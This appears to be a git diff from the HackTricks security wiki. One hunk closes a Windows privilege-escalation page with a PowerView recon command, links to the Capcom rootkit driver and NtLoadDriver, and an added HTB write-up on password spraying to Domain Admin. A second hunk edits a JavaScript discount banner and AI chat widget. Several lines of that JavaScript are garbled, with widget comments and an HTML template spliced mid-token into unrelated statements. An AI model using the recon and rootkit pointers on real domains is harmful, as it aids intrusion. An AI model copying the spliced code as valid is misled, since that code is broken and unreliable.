@ -257,6 +276,7 @@ Get-NetGroupMember -Identity "Server Operators" -Recurse
- [https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys)
- [https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e](https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e)
- [https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html](https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html)
- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -5,7 +5,10 @@
(() => {
const KEY = 'htSummerDiscountsDismissed';
const IMG = '/images/discount.jpeg';
const IMG = '/ima * HackTricks AI Chat Widget v1.17 enhanced resizable sidebar
* ---------------------------------------------------
* Markdown rendering + sanitised (same as before)
* ENHANCED: improved dragtoresize panel with better UXdiscount.jpeg';
const TXT = 'Click here for HT Summer Discounts, Last Days!';
const URL = 'https://training.hacktricks.xyz';
@ -13,7 +16,20 @@
if (localStorage.getItem(KEY) === 'true') return;
// Quick helper
const $ = (tag, css = '') => Object.assign(document.createElement(tag), { style: css });
const $ = (tag, css = '') => Object.assign(document.cr p.innerHTML = `
<div id="ht-ai-header">
<strong>HackTricks AI Chat</strong>
<span style="font-size:11px;opacity:0.6;margin-left:8px;"> Drag edge to resize</span>
<div class="ht-actions">
<button id="ht-ai-reset" title="Reset"></button>
<span id="ht-ai-close" title="Close"></span>
</div>
</div>
<div id="ht-ai-chat"></div>
<div id="ht-ai-input">
<textarea id="ht-ai-question" placeholder="Type your question…"></textarea>
<button id="ht-ai-send">Send</button>
</div>`;tag), { style: css });
// --- Overlay (blur + dim) ---
const overlay = $('div', `
@ -111,7 +127,7 @@
const MAX_CONTEXT = 3000; // highlightedtext char limit
const MAX_QUESTION = 500; // question char limit
const MIN_W = 250; // ← resize limits →
const MAX_W = 600;
const MAX_W = 800;
const DEF_W = 350; // default width (if nothing saved)
const TOOLTIP_TEXT =
"💡 Highlight any text on the page,\nthen click to ask HackTricks AI about it";
@ -345,8 +361,9 @@
#ht-ai-panel{position:fixed;top:0;right:0;height:100%;max-width:90vw;background:#000;color:#fff;display:flex;flex-direction:column;transform:translateX(100%);transition:transform .3s ease;z-index:100000;font-family:system-ui,-apple-system,Segoe UI,Roboto,"Helvetica Neue",Arial,sans-serif}
#ht-ai-panel.open{transform:translateX(0)}
@media(max-width:768px){#ht-ai-panel{display:none}}
#ht-ai-header{display:flex;justify-content:space-between;align-items:center;padding:12px 16px;border-bottom:1px solid #333}
#ht-ai-header .ht-actions{display:flex;gap:8px;align-items:center}
#ht-ai-header{display:flex;justify-content:space-between;align-items:center;padding:12px 16px;border-bottom:1px solid #333;flex-wrap:wrap}
#ht-ai-header strong{flex-shrink:0}
#ht-ai-header .ht-actions{display:flex;gap:8px;align-items:center;margin-left:auto}
#ht-ai-close,#ht-ai-reset{cursor:pointer;font-size:18px;background:none;border:none;color:#fff;padding:0}
#ht-ai-close:hover,#ht-ai-reset:hover{opacity:.7}
#ht-ai-chat{flex:1;overflow-y:auto;padding:16px;display:flex;flex-direction:column;gap:12px;font-size:14px}
@ -367,8 +384,10 @@
::selection{background:#ffeb3b;color:#000}
::-moz-selection{background:#ffeb3b;color:#000}
/* NEW: resizer handle */
#ht-ai-resizer{position:absolute;left:0;top:0;width:6px;height:100%;cursor:ew-resize;background:transparent}
#ht-ai-resizer:hover{background:rgba(255,255,255,.05)}`;
#ht-ai-resizer{position:absolute;left:0;top:0;width:8px;height:100%;cursor:ew-resize;background:rgba(255,255,255,.08);border-right:1px solid rgba(255,255,255,.15);transition:background .2s ease}
#ht-ai-resizer:hover{background:rgba(255,255,255,.15);border-right:1px solid rgba(255,255,255,.3)}
#ht-ai-resizer:active{background:rgba(255,255,255,.25)}
#ht-ai-resizer::before{content:'';position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);width:2px;height:20px;background:rgba(255,255,255,.4);border-radius:1px}`;
const s = document.createElement("style");
s.id = "ht-ai-style";
s.textContent = css;
@ -432,24 +451,43 @@
const onMove = (e) => {
if (!dragging) return;
const dx = startX - e.clientX; // dragging leftwards ⇒ +dx
e.preventDefault();
const clientX = e.clientX || (e.touches && e.touches[0].clientX);
const dx = startX - clientX; // dragging leftwards ⇒ +dx
let newW = startW + dx;
newW = Math.min(Math.max(newW, MIN_W), MAX_W);
panel.style.width = newW + "px";
};
const onUp = () => {
if (!dragging) return;
dragging = false;
handle.style.background = "";
document.body.style.userSelect = "";
document.body.style.cursor = "";
localStorage.setItem("htAiWidth", parseInt(panel.style.width, 10));
document.removeEventListener("mousemove", onMove);
document.removeEventListener("mouseup", onUp);
document.removeEventListener("touchmove", onMove);
document.removeEventListener("touchend", onUp);
};
handle.addEventListener("mousedown", (e) => {
const onStart = (e) => {
e.preventDefault();
dragging = true;
startX = e.clientX;
startX = e.clientX || (e.touches && e.touches[0].clientX);
startW = parseInt(window.getComputedStyle(panel).width, 10);
handle.style.background = "rgba(255,255,255,.25)";
document.body.style.userSelect = "none";
document.body.style.cursor = "ew-resize";
document.addEventListener("mousemove", onMove);
document.addEventListener("mouseup", onUp);
});
document.addEventListener("touchmove", onMove, { passive: false });
document.addEventListener("touchend", onUp);
};
handle.addEventListener("mousedown", onStart);
handle.addEventListener("touchstart", onStart, { passive: false });
}
})();